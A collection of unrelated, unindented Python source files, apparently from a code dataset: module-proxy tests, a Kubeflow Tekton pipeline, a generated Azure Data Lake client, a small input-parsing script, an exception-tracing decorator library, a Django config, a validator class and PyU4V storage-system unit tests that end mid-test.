proxiedmod = module_utils.LightProxyModule(mod.__name__, mod)
assert hasattr(proxiedmod, 'sys')
assert isinstance(proxiedmod.sys, types.ModuleType)
assert hasattr(proxiedmod, 'a')
assert proxiedmod.a == 10
assert hasattr(proxiedmod, 'Klass')
assert isinstance(proxiedmod.Klass, type)
assert issubclass(proxiedmod.Klass, mod.Klass)
proxiedmod.a = 20
assert proxiedmod.a == 20
assert mod.a == 20
del proxiedmod.a
assert not hasattr(proxiedmod, 'a')
assert not hasattr(mod, 'a')
assert proxiedmod.func(10) == 10
KlassRef = proxiedmod.Klass
proxiedmod = import_utils.reload(proxiedmod)
# Light proxy does not handle attribute references, only module ref is preserved
assert KlassRef is not proxiedmod.Klass
del sys.modules[mod.__name__]
def test_lang_import_module_proxy(self):
mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
proxiedmod = module_utils.ProxyModule(mod.__name__, mod)
assert hasattr(proxiedmod, 'sys')
assert isinstance(proxiedmod.sys, types.ModuleType)
assert hasattr(proxiedmod, 'a')
assert proxiedmod.a == 10
assert proxiedmod.a > 1
assert proxiedmod.a < 100
assert proxiedmod.a + 1 == 11
assert isinstance(proxiedmod.a, int)
assert hasattr(proxiedmod, 'Klass')
assert isinstance(proxiedmod.Klass, type)
assert issubclass(proxiedmod.Klass, mod.Klass)
proxiedmod.a = 20
assert proxiedmod.a == 20
assert mod.a == 20
proxiedmod.__dict__['a'] = 30
assert proxiedmod.a == 30
assert mod.a == 30
del proxiedmod.a
assert not hasattr(proxiedmod, 'a')
assert not hasattr(mod, 'a')
assert proxiedmod.func(10) == 10
KlassRef = proxiedmod.Klass
proxiedmod = import_utils.reload(proxiedmod)
# Refs are kept after reload
assert KlassRef is proxiedmod.Klass
del sys.modules[mod.__name__]
def test_lang_import_module_autoloading_light_proxy(self):
mod = importlib.import_module(__package__ + '.testdata.proxiedmod')
proxiedmod = module_utils.AutoloadingLightProxyModule(mod.__name__, mod)
assert hasattr(proxiedmod, 'Klass')
K_1 = proxiedmod.Klass
dumped = pickle.dumps(proxiedmod)
loaded = pickle.loads(dumped)
assert hasattr(loaded, 'Klass')
assert loaded.Klass is K_1
del loaded
del proxiedmod
del sys.modules[mod.__name__]
del mod
proxiedmod = module_utils.AutoloadingLightProxyModule(__package__ + '.testdata.proxiedmod')
assert hasattr(proxiedmod, 'Klass')
assert proxiedmod.Klass is not K_1
| 3,304 | 1,118 |
# Copyright 2021 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import kfp.dsl as dsl
from kfp import components
from kfp_tekton import tekton
op1_yaml = '''\
name: 'my-in-coop1'
inputs:
- {name: item, type: Integer}
- {name: my_pipe_param, type: Integer}
implementation:
container:
image: library/bash:4.4.23
command: ['sh', '-c']
args:
- |
set -e
echo op1 "$0" "$1"
- {inputValue: item}
- {inputValue: my_pipe_param}
'''
@dsl.pipeline(name='my-pipeline')
def pipeline(my_pipe_param: int = 10):
loop_args = [1, 2]
# The DSL above should produce the same result and the DSL in the bottom
# with dsl.ParallelFor(loop_args, parallelism=1) as item:
# op1_template = components.load_component_from_text(op1_yaml)
# op1 = op1_template(item, my_pipe_param)
# condi_1 = tekton.CEL_ConditionOp(f"{item} == 0").output
# with dsl.Condition(condi_1 == 'true'):
# tekton.Break()
with tekton.Loop.sequential(loop_args) as item:
op1_template = components.load_component_from_text(op1_yaml)
op1 = op1_template(item, my_pipe_param)
condi_1 = tekton.CEL_ConditionOp(f"{item} == 1").output
with dsl.Condition(condi_1 == 'true'):
tekton.Break()
if __name__ == '__main__':
from kfp_tekton.compiler import TektonCompiler
TektonCompiler().compile(pipeline, __file__.replace('.py', '.yaml'))
| 1,972 | 673 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from .. import models
class DataLakeStoreAccountsOperations(object):
"""DataLakeStoreAccountsOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An objec model deserializer.
:ivar api_version: Client Api Version. Constant value: "2016-11-01".
"""
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2016-11-01"
self.config = config
def add(
self, resource_group_name, account_name, data_lake_store_account_name, suffix=None, custom_headers=None, raw=False, **operation_config):
"""Updates the specified Data Lake Analytics account to include the
additional Data Lake Store account.
:param resource_group_name: The name of the Azure resource group that
contains the Data Lake Analytics account.
:type resource_group_name: str
:param account_name: The name of the Data Lake Analytics account to
which to add the Data Lake Store account.
:type account_name: str
:param data_lake_store_account_name: The name of the Data Lake Store
account to add.
:type data_lake_store_account_name: str
:param suffix: the optional suffix for the Data Lake Store account.
:type suffix: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
parameters = None
if suffix is not None:
parameters = models.AddDataLakeStoreParameters(suffix=suffix)
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
if parameters is not None:
body_content = self._serialize.body(parameters, 'AddDataLakeStoreParameters')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete(
self, resource_group_name, account_name, data_lake_store_account_name, custom_headers=None, raw=False, **operation_config):
"""Updates the Data Lake Analytics account specified to remove the
specified Data Lake Store account.
:param resource_group_name: The name of the Azure resource group that
contains the Data Lake Analytics account.
:type resource_group_name: str
:param account_name: The name of the Data Lake Analytics account from
which to remove the Data Lake Store account.
:type account_name: str
:param data_lake_store_account_name: The name of the Data Lake Store
account to remove
:type data_lake_store_account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: None or
:class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def get(
self, resource_group_name, account_name, data_lake_store_account_name, custom_headers=None, raw=False, **operation_config):
"""Gets the specified Data Lake Store account details in the specified
Data Lake Analytics account.
:param resource_group_name: The name of the Azure resource group that
contains the Data Lake Analytics account.
:type resource_group_name: str
:param account_name: The name of the Data Lake Analytics account from
which to retrieve the Data Lake Store account details.
:type account_name: str
:param data_lake_store_account_name: The name of the Data Lake Store
account to retrieve
:type data_lake_store_account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: :class:`DataLakeStoreAccountInfo
<azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
or :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if
raw=true
:rtype: :class:`DataLakeStoreAccountInfo
<azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
or :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/{dataLakeStoreAccountName}'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'dataLakeStoreAccountName': self._serialize.url("data_lake_store_account_name", data_lake_store_account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DataLakeStoreAccountInfo', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_by_account(
self, resource_group_name, account_name, filter=None, top=None, skip=None, select=None, orderby=None, count=None, custom_headers=None, raw=False, **operation_config):
"""Gets the first page of Data Lake Store accounts linked to the specified
Data Lake Analytics account. The response includes a link to the next
page, if any.
:param resource_group_name: The name of the Azure resource group that
contains the Data Lake Analytics account.
:type resource_group_name: str
:param account_name: The name of the Data Lake Analytics account for
which to list Data Lake Store accounts.
:type account_name: str
:param filter: OData filter. Optional.
:type filter: str
:param top: The number of items to return. Optional.
:type top: int
:param skip: The number of items to skip over before returning
elements. Optional.
:type skip: int
:param select: OData Select statement. Limits the properties on each
entry to just those requested, e.g.
Categories?$select=CategoryName,Description. Optional.
:type select: str
:param orderby: OrderBy clause. One or more comma-separated
expressions with an optional "asc" (the default) or "desc" depending
on the order you'd like the values sorted, e.g.
Categories?$orderby=CategoryName desc. Optional.
:type orderby: str
:param count: The Boolean value of true or false to request a count of
the matching resources included with the resources in the response,
e.g. Categories?$count=true. Optional.
:type count: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of :class:`DataLakeStoreAccountInfo
<azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfo>`
:rtype: :class:`DataLakeStoreAccountInfoPaged
<azure.mgmt.datalake.analytics.account.models.DataLakeStoreAccountInfoPaged>`
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeAnalytics/accounts/{accountName}/DataLakeStoreAccounts/'
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int', minimum=1)
if skip is not None:
query_parameters['$skip'] = self._serialize.query("skip", skip, 'int', minimum=1)
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, 'str')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
if count is not None:
query_parameters['$count'] = self._serialize.query("count", count, 'bool')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.DataLakeStoreAccountInfoPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.DataLakeStoreAccountInfoPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
| 17,700 | 4,643 |
# Enter your code here. Read input from STDIN. Print output to STDOUT
from collections import defaultdict
n, m = map(int, input().split())
d = defaultdict(lambda: -1)
for i in range(1, n+1):
word = input()
d[word] = d[word] + ' ' + str(i) if word in d else str(i)
for _ in range(m):
print(d[input()])
| 317 | 118 |
# -*- coding: utf-8 -*-
# Copyright (c) 2022, KarjaKAK
# All rights reserved.
from functools import wraps
from textwrap import fill
from contextlib import redirect_stdout
from datetime import datetime as dt
import io, inspect, os, sys
__all__ = ['']
DIRPATH = (
os.environ["USERPROFILE"] if sys.platform.startswith("win") else os.environ["HOME"]
)
DEFAULTDIR = os.path.join(DIRPATH, "EXCPTR")
DEFAULTFILE = os.path.join(
DEFAULTDIR, f"{int(dt.timestamp(dt.today().replace(microsecond=0)))}_EXCPTR.log"
)
def defd():
"""Create default directory"""
if not os.path.isdir(DEFAULTDIR):
os.mkdir(DEFAULTDIR)
else:
raise Exception(f"{DEFAULTDIR} is already exist!")
def prex(details, exc_tr, fc_name):
"""Printing Exception"""
print(f"\nFilename caller: {details[0].filename.upper()}\n")
print(f"ERROR - <{fc_name}>:")
print(f"{'-' * 70}", end="\n")
print("Start at:\n")
filenm = details[0].filename
for detail in details:
if "excptr.py" not in detail.filename:
if filenm != detail.filename:
print(f"Filename: {detail.filename.upper()}\n")
cc = fill(
"".join(detail.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {detail.lineno} in {detail.function}:\n" f"{cc}\n")
del cc
del detail
tot = f">>>- Exception raise: {exc_tr.__class__.__name__} ->"
print("~" * len(tot))
print(tot)
print("~" * len(tot) + "\n")
allextr = inspect.getinnerframes(exc_tr.__traceback__)[1:]
for extr in allextr:
if "excptr.py" not in extr.filename:
if filenm != extr.filename:
print(f"Filename: {extr.filename.upper()}\n")
cc = fill(
"".join(extr.code_context).strip(),
initial_indent=" " * 4,
subsequent_indent=" " * 4,
)
print(f"line {extr.lineno} in {extr.function}:\n" f"{cc}\n")
del cc
del extr
print(f"{exc_tr.__class__.__name__}: {exc_tr.args[0]}")
print(f"{'-' * 70}", end="\n")
del tot, allextr, filenm, details, exc_tr, fc_name
def crtk(v: str):
"""Tkinter gui display"""
import tkinter as tk
from tkinter import messagebox as msg
root = tk.Tk()
root.title("Exception Error Messages")
root.attributes("-topmost", 1)
text = tk.Listbox(root, relief=tk.FLAT, width=70, selectbackground="light green")
text.pack(side="left", expand=1, fill=tk.BOTH, pady=2, padx=(2, 0))
scr = tk.Scrollbar(root, orient=tk.VERTICAL)
scr.pack(side="right", fill=tk.BOTH)
scr.config(command=text.yview)
text.config(yscrollcommand=scr.set)
val = v.splitlines()
for v in val:
text.insert(tk.END, v)
text.config(
state=tk.DISABLED,
bg="grey97",
disabledforeground="black",
font="courier 12",
height=len(val),
)
del val, v
scnd = 5000
def viewing():
nonlocal scnd
scnd += scnd if scnd < 20000 else 5000
match scnd:
case sec if sec <= 25000:
ans = msg.askyesno(
"Viewing",
f"Still viewing for another {scnd//1000} seconds?",
parent=root,
)
if ans:
root.after(scnd, viewing)
else:
root.destroy()
case sec if sec > 25000:
msg.showinfo(
"Viewing", "Viewing cannot exceed more than 1 minute!", parent=root
)
root.destroy()
root.after(5000, viewing)
root.mainloop()
del root, text, scr, scnd
def ckrflex(filenm: str) -> bool:
"""Checking file existence or an empty file"""
if os.path.exists(filenm):
with open(filenm) as rd:
if rd.readline():
return False
else:
return True
else:
return True
def excp(m: int = -1, filenm: str = None):
"""Decorator for function"""
match m:
case m if not isinstance(m, int):
raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def ckerr(f):
ckb = m
@wraps(f)
def trac(*args, **kwargs):
try:
if fn := f(*args, **kwargs):
return fn
del fn
except Exception as e:
details = inspect.stack()[1:][::-1]
match ckb:
case -1:
raise
case 0:
prex(details, e, f.__name__)
case 1:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
crtk(v.getvalue())
v.flush()
case 2:
if filenm:
v = io.StringIO()
with redirect_stdout(v):
prex(details, e, f.__name__)
wrm = (
str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
if ckrflex(filenm)
else "\n"
+ str(dt.today()).rpartition(".")[0]
+ ": TRACING EXCEPTION\n"
)
with open(filenm, "a") as log:
log.write(wrm)
log.write(v.getvalue())
v.flush()
del v, wrm
else:
raise
del details, e
return trac
return ckerr
def excpcls(m: int = -1, filenm: str = None):
"""Decorator for class (for functions only)"""
match m:
case m if not isinstance(m, int):
raise ValueError(f'm = "{m}" Need to be int instead!')
case m if m not in [-1, 0, 1, 2]:
raise ValueError(
f'm = "{m}" Need to be either one of them, [-1 or 0 or 1 or 2]!'
)
def catchcall(cls):
ckb = m
match cls:
case cls if not inspect.isclass(cls):
raise TypeError("Type error, suppose to be a class!")
case _:
for name, obj in vars(cls).items():
if inspect.isfunction(obj):
setattr(cls, name, excp(ckb, filenm)(obj))
return cls
return catchcall
| 6,966 | 2,174 |
from django.apps import AppConfig
class ImsConfig(AppConfig):
name = 'ims'
| 81 | 27 |
class Validator(object):
def __init__(self,name,check=None,action=None):
self.name = '{0}_validator'.format(name)
self.check = check
self.action = action
def __call__(self,message):
return self.check(message)
def set(self,action):
if not (action == 'check' or action == 'action'):
raise TypeError('Invalid action name. Must be "check" or "action".')
def wrapper(func):
setattr(self,action,func)
return func
return wrapper
class KeywordValidator(Validator):
def __init__(self,name,action=None):
def keyword_check(message):
return name.lower() == message.text.lower()
super(KeywordValidator,self).__init__(name,keyword_check,action)
| 772 | 216 |
# Copyright (c) 2020 Dell Inc. or its subsidiaries.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""test_pyu4v_system.py."""
import testtools
import time
from pathlib import Path
from unittest import mock
from unittest.mock import MagicMock
from PyU4V import common
from PyU4V import rest_requests
from PyU4V.tests.unit_tests import pyu4v_common_data as pcd
from PyU4V.tests.unit_tests import pyu4v_fakes as pf
from PyU4V import univmax_conn
from PyU4V.utils import constants
from PyU4V.utils import exception
from PyU4V.utils import file_handler
ARRAY_ID = constants.ARRAY_ID
ARRAY_NUM = constants.ARRAY_NUM
HEALTH = constants.HEALTH
HEALTH_CHECK = constants.HEALTH_CHECK
SG_ID = constants.SG_ID
SG_NUM = constants.SG_NUM
SYMMETRIX = constants.SYMMETRIX
SYSTEM = constants.SYSTEM
LOCAL_USER = constants.LOCAL_USER
TAG = constants.TAG
TAG_NAME = constants.TAG_NAME
ALERT_ID = pcd.CommonData.alert_id
ALERT = constants.ALERT
AUDIT_LOG_RECORD = constants.AUDIT_LOG_RECORD
EXPORT_FILE = constants.EXPORT_FILE
AUDIT_LOG_FILENAME = constants.AUDIT_LOG_FILENAME
SUCCESS = constants.SUCCESS
BINARY_DATA = constants.BINARY_DATA
AUDIT_RECORD_PATH = constants.AUDIT_RECORD_PATH
class PyU4VSystemTest(testtools.TestCase):
"""Test System."""
def setUp(self):
"""Setup."""
super(PyU4VSystemTest, self).setUp()
self.data = pcd.CommonData()
self.conf_file, self.conf_dir = (
pf.FakeConfigFile.create_fake_config_file())
univmax_conn.file_path = self.conf_file
with mock.patch.object(
rest_requests.RestRequests, 'establish_rest_session',
return_value=pf.FakeRequestsSession()):
self.conn = univmax_conn.U4VConn(array_id=self.data.array)
self.common = self.conn.common
self.system = self.conn.system
def test_get_system_health(self):
"""Test get_system_health."""
health_check_result = self.system.get_system_health()
self.assertEqual(self.data.array_health, health_check_result)
def test_list_system_health_check(self):
"""Test list_system_health_checks."""
health_check_list = self.system.list_system_health_check()
self.assertEqual(self.data.array_health_check_list, health_check_list)
def test_get_health_check_details(self):
"""Test get_health_check_details."""
health_check = self.system.get_health_check_details(health_check_id=1)
self.assertEqual(self.data.health_check_response, health_check)
def test_perform_health_check(self):
"""Test perform_health_check."""
run_test = self.system.perform_health_check()
self.assertEqual(run_test, self.data.perform_health_check_response)
def test_delete_health_check(self):
"""Test delete_health_check."""
common.CommonFunctions.delete_resource = MagicMock(
side_effect=self.common.delete_resource)
self.system.delete_health_check(health_check_id=1)
common.CommonFunctions.delete_resource.assert_called_once_with(
category=SYSTEM, resource_level=SYMMETRIX,
resource_level_id=self.conn.array_id, resource_type=HEALTH,
resource_type_id=HEALTH_CHECK, object_type=1)
def test_get_disk_id_list(self):
"""Test get_disk_id_list."""
disk_list = self.system.get_disk_id_list(failed=True)
self.assertEqual(self.data.disk_list, disk_list)
def test_get_disk_details(self):
"""Test get_disk_details."""
disk_info = self.system.get_disk_details(disk_id='1')
self.assertEqual(self.data.disk_info, disk_info)
def test_get_tags(self):
"""Test get_tags."""
common.CommonFunctions.get_resource = MagicMock(
side_effect=self.common.get_resource)
tag_list = self.system.get_tags(
array_id=self.conn.array_id, tag_name='UNIT-TEST',
storage_group_id='TEST-SG', num_of_storage_groups=1,
num_of_arrays=3)
common.CommonFunctions.get_resource.assert_called_once_with(
category=SYSTEM, resource_level=TAG, params={
ARRAY_ID: self.conn.array_id, TAG_NAME: 'UNIT-TEST',
SG_ID: 'TEST-SG', SG_NUM: '1', ARRAY_NUM: '3'})
self.assertEqual(self.data.tag_list, tag_list)
def test_get_tagged_objects(self):
"""Test get_tagged_objects."""
tagged_objects = self.system.get_tagged_objects(tag_name='UNIT-TEST')
self.assertEqual(self.data.tagged_objects, tagged_objects)
def test_get_alert_summary(self):
"""Test get_alert_summary."""
alert_summary = self.system.get_alert_summary()
self.assertEqual(self.data.alert_summary, alert_summary)
def test_get_alert_ids(self):
"""Test get_alert_ids."""
alert_ids = self.system.get_alert_ids(
array='123456789', _type='Server', severity='Warning', state='New',
created_date='1234455', _object='BE', object_type='Director',
acknowledged=True, description='Alert')
self.assertEqual(self.data.alert_list['alertId'], alert_ids)
def test_get_alert_details(self):
"""Test get_alert_details."""
alert_details = self.system.get_alert_details(
alert_id=ALERT_ID)
self.assertEqual(self.data.alert_details, alert_details)
@mock.patch.object(common.CommonFunctions, 'modify_resource')
def test_acknowledge_alert(self, mck_modify):
"""Test acknowledge_alert."""
ref_payload = {'editAlertActionParam': 'ACKNOWLEDGE'}
self.system.acknowledge_alert(alert_id=ALERT_ID)
mck_modify.assert_called_once_with(
category=SYSTEM, resource_level=ALERT,
resource_level_id=ALERT_ID, payload=ref_payload)
@mock.patch.object(common.CommonFunctions, 'delete_resource')
def test_delete_alert(self, mck_delete):
"""Test delete_alert."""
self.system.delete_alert(alert_id=ALERT_ID)
mck_delete.assert_called_once_with(
category=SYSTEM, resource_level=ALERT, resource_level_id=ALERT_ID)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_return_binary(self, mck_dl):
"""Test _download_settings success binary data returned."""
response = self.system._download_settings(request_body=dict(),
return_binary=True)
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
self.assertTrue(response['success'])
self.assertIn('binary_data', response.keys())
self.assertEqual(b'test_binary_data', response['binary_data'])
@mock.patch('builtins.open', new_callable=mock.mock_open)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_write_file(self, mck_dl, mck_open):
"""Test _download_settings success"""
response = self.system._download_settings(request_body=dict())
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
mck_open.assert_called_once()
self.assertTrue(response['success'])
self.assertIn(str(Path.cwd()), str(response['settings_path']))
self.assertIn(constants.SETTINGS_FILENAME_TEMPLATE,
str(response['settings_path']))
@mock.patch('builtins.open', new_callable=mock.mock_open)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_success_write_file_custom_path(self, mck_dl,
mck_open):
"""Test _download_settings success"""
response = self.system._download_settings(
request_body=dict(), file_name='test', dir_path=Path.home())
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
mck_open.assert_called_once()
self.assertTrue(response['success'])
self.assertIn(str(Path.home()), str(response['settings_path']))
self.assertIn('test.zip', str(response['settings_path']))
@mock.patch.object(common.CommonFunctions, 'download_file',
return_value=None)
def test_download_settings_fail_no_response(self, mck_dl):
"""Test _download_settings fail no response from API."""
response = self.system._download_settings(request_body=dict())
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
self.assertEqual({'success': False}, response)
@mock.patch.object(
common.CommonFunctions, 'download_file',
return_value=pf.FakeResponse(200, dict(), content=b'test_binary_data'))
def test_download_settings_dir_path_exception(self, mck_dl):
"""Test _download_settings directory doesn't exist exception."""
self.assertRaises(
exception.InvalidInputException,
self.system._download_settings,
request_body=dict(), dir_path='fake')
mck_dl.assert_called_once_with(
category=constants.SYSTEM, resource_level=constants.SETTINGS,
resource_type=constants.EXPORT_FILE, payload=dict())
def test_download_all_settings(self):
"""Test download_all_settings."""
ref_request_body = {
constants.FILE_PASSWORD: 'test_password',
constants.SRC_ARRAY: self.data.remote_array}
with mock.patch.object(self.system, '_download_settings') as mck_dl:
self.system.download_all_settings(
file_password='test_password', dir_path='/test/file/path',
file_name='test_filename', array_id=self.data.remote_array,
return_binary=True)
mck_dl.assert_called_once_with(
request_body=ref_request_body, dir_path='/test/file/path',
file_name='test_filename', return_binary=True)
def test_download_unisphere_settings_1_2_params(self):
"""Test download_unisphere_settings success 1 & 2 output params."""
ref_request_body = {
constants.FILE_PASSWORD: 'test_password',
constants.SRC_ARRAY: self.conn.array_id,
constants.EXCLUDE_SYS_SETTINGS: [constants.ALL_SETTINGS],
constants.EXCLUDE_UNI_SETTINGS: [constants.UNI_ALERT_SETTINGS,
constants.UNI_PERF_PREF_SETTINGS]}
with mock.patch.object(self.system, '_download_settings') as mck_dl:
